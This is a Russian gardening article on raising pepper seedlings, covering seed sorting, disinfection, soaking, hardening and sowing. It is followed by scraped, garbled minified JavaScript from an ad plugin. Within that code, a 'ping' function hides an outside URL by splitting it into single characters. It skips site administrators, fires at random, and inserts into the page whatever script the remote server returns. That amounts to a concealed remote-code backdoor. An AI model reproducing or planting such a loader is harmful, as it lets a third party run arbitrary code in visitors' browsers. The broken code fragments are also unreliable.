Выращивание рассады перца – сложный процесс, от которого напрямую зависит объем будущего урожая. На этом этапе развития растений легко допустить ошибки, приводящие к гибели всей посадки. Опытные садоводы рекомендуют соблюдать сроки посева, использовать уже готовые субстраты для посадки и применять только магазинные стимуляторы, подкормки. Это позволяет избежать дисбаланса химического состава, что пагубно влияет на развитие всходов.

Почему пропадает и гибнет рассада после всходов после посадки

Рассада имеет слабый иммунитет, может погибнуть на фоне множества факторов. Основные причины, почему сеянцы чахнут:

  • недостаточная или чрезмерная влажность грунта;
  • заражение болезнями, вредителями;
  • некачественный посадочный материал;
  • недостаток освещения в помещении;
  • несоблюдение температурного режима.

Нередко рассада гибнет после переохлаждения. В первый месяц выращивания перца следует избегать сквозняков, воздействия низких температур.

Рассада перца сильно вытянулась после всходов

Выделяют две основные причины вытягивания рассады перца – избыток азота в грунте, выращивание растений в затемненном месте. Если вы заметили, что стебель формируется слишком быстро, а листья мелкие, следует скорректировать объем освещения. Желательно отказаться от подкормок азотными составами, в качестве удобрения использовать только фосфорно-калийные смеси. В редких случаях перец вытягивается при загущенной посадке, в такой ситуации достаточно проредить всходы. Про посадку острого перца на рассаду расскажет эта ссылка.

Видео

Про уход за рассадой перца смотрите в этом видео

Как обработать семена перца перед посадкой?

Необработанные или собранные самостоятельно семена перца нуждаются в проверке на всхожесть и особых способах обработки, которые стимулируют рост растений и исключают риск развития грибковых заболеваний. Для того чтобы укрепить семена и будущую рассаду рекомендуется проводить дополнительное закаливание. Все необходимые процедуры можно провести в домашних условиях, но необходимо делать это правильно.

Семена перца быстро теряют всхожесть, поэтому ни в коем случае не нужно делать предварительных запасов в большом количестве задолго до посева. Существует несколько методов подготовки. Не следует использовать все сразу, иначе можно добиться обратного эффекта. Достаточно провести 2–3 процедуры, что намного улучшит всхожесть и дальнейший процесс выращивания.


Покупая семена перца, следует отдавать предпочтение проверенным производителям и обращать внимание на срок годности. Зачастую в продаже имеется посевной материал, уже прошедший все необходимые проверки и обработки, которые помогают огородникам вырастить хорошую рассаду, но стоимость его намного дороже.

Изначально посевной материал отбирается по размеру. Его необходимо высыпать на белый лист бумаги и исключить слишком маленькие или большие семена.

В дальнейшем семена проверяют на всхожесть в солевом растворе. Для этого необходимо 1,5–2 ст. л.соли растворить в 1 л воды комнатной температуры. После погружения посевного материала в раствор происходит их разделение, часть сразу всплывает на поверхность, а остальные медленно погружаются на дно. Вся процедура проводится в пределах 10 минут, после чего осевшие семена промывают в пресной воде и оставляют для просушки. Проверка на всхожесть проводится непосредственно перед посевом семян.

До посадки на рассаду необходимо обработать семена перцев. Проводят дезинфекцию посевного материала, чтобы исключить возможность развития патогенов как на нем, так и в дальнейшем на растении.

Зачастую протравливание в домашних условиях проводят соком алоэ или марганцовкой. Но в случае с перцем алоэ не подходит, так как его сок действует угнетающе.


Протравливание семян перца с помощью марганцовки проводится следующим образом:
  1. 1. Посевной материал перца высыпают в марлевую ткань или специальный тканевый мешочек.
  2. 2. В отдельной емкости готовится рабочий раствор марганцовки. Он должен быть насыщенного розового цвета, но не слишком концентрированный.
  3. 3. Семена опускают в раствор на 12 минут.
  4. 4. Достают семена и промывают в прохладной кипяченой воде.
  5. 5. Раскладывают на бумаге для просушки.

В последнее время получила широкую популярность процедура обеззараживания с помощью перекиси водорода, которую проводят по аналогичному принципу. Для замачивания используют 10%-й раствор перекиси в соотношении 1:1, то есть количество жидкости должно быть равным количеству посевного материала. После процедуры семена высыпают на просушку, чтобы они приобрели характерную сыпучесть.

Такая процедура считается обязательной для дружного прорастания семян перца. В этих целях используют настой крапивы, который готовят в пропорции 50 г листьев растения на 1 стакан кипятка. Семена выдерживают в полученной смеси не менее 15 минут, после чего просушивают.

Можно воспользоваться готовыми препаратами, которые продаются в специализированных магазинах:

  • Эпином — 3 капли на 100 мл воды замочить на 2–4 часа;
  • Цирконом — 4 капли на 100 мл воды замочить на 3 часа;
  • Янтарной кислотой — 1,5 г на 1,5 л воды замочить на 12–24 часа.

Такой способ позволяет добиться повышенной всхожести, усиления роста растений в дальнейшем, устойчивости к негативным внешним факторам.

Для насыщения посевного материала микроэлементами применяют замачивание в растворе древесной золы, которая содержит порядка 30 микроэлементов. Это способствует укреплению будущей рассады и помогает повысить ее устойчивость к воздействию грибковых заболеваний. Замачивание в золе проводится за 1–2 дня до планируемого посева. Процедура проводится следующим образом:

  1. 1. Готовят рабочий раствор из расчета 20 г золы на 1 л воды.
  2. 2. Периодически помешивают полученную смесь.
  3. 3. Оставляют настаиваться на 24 часа.
  4. 4. Семена завертывают в ткань и опускают в раствор на 5 часов.
  5. 5. Достают, промывают водой и сушат.


Непосредственно после процедуры можно проводить посев семян в почву.

Не всегда есть возможность использовать препараты и стимуляторы роста для замачивания и обработки семян перца. Но ускорить прорастание можно замочив посевной материал в обычной воде. Для этого:

  1. 1. На дно контейнера укладывают поролон или любую ткань, которые обильно увлажняют.
  2. 2. На поверхности аккуратно распределяют семена.
  3. 3. Сверху накрывают влажной салфеткой.
  4. 4. Ставят в темное теплое место (не менее 25 градусов) на проращивание.
  5. 5. Периодически увлажняют по мере подсыхания салфетки.

После набухания семян и появления ростков, следует высадить их в емкости с почвой для дальнейшего проращивания или провести процедуру закаливания.

Сажают набухшие семена перца только во влажный субстрат, в противном случае они погибают.

Этот метод позволяет подготовить молодые саженцы к дальнейшей посадке в открытый грунт и возможным перепадам температуры в дальнейшем. Для этого проросшие перцы ставят в холодильник на полку для хранения овощей. Продолжительность закаливания составляет в пределах 4–7 дней.

По истечении времени семена достают и сеют в подготовленный субстрат. На этом этапе заканчивается предпосевная подготовка семян перца.

После набухания семян проводят их посев непосредственно после полива грунта. Рекомендуется подготовить для каждого сорта отдельную емкость для посадки, так как всходы могут появиться в разное время, что затруднит пикировку. Если есть возможность, то необходимо посадить каждое семя в отдельный стаканчик, так как перец является культурой, которая очень требовательна к пересадкам.

Для посадки рекомендуется использовать субстрат для рассады, который продается в магазине или приготовить его самостоятельно в таких пропорциях:

  • 2 части дерновой земли;
  • 2 части листовой земли;
  • 1 часть речного песка.

Перед непосредственным посевом грунт проливают раствором фунгицида Превикур, для предотвращения развития корневой гнили в дальнейшем. Проросшие семена раскладывают на поверхности и присыпают сверху слоем грунта 1–1,5 см. Емкости накрывают сверху пленкой или стеклом и помещают в теплое темное место до появления всходов. Молодые ростки появляются в течение 3 недель после посадки. Периодически следует увлажнять сверху субстрат с помощью пульверизатора и снимать с крышки конденсат.

После появления дружных всходов контейнеры необходимо переставить на светлый подоконник и обеспечить дополнительную подсветку в вечернее время. При недостатке света рассада перца будет вытягиваться. Когда ростки окрепнут, контейнеры приоткрывают для адаптации саженцев: первый день на 15 минут, с каждым последующим днем необходимо увеличивать интервал времени на 10 минут. Для улучшения процесса адаптации всходы опрыскивают Эпином или Цирконом. Рассаживают ростки по отдельным емкостям при появлении 2–3 настоящих листов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};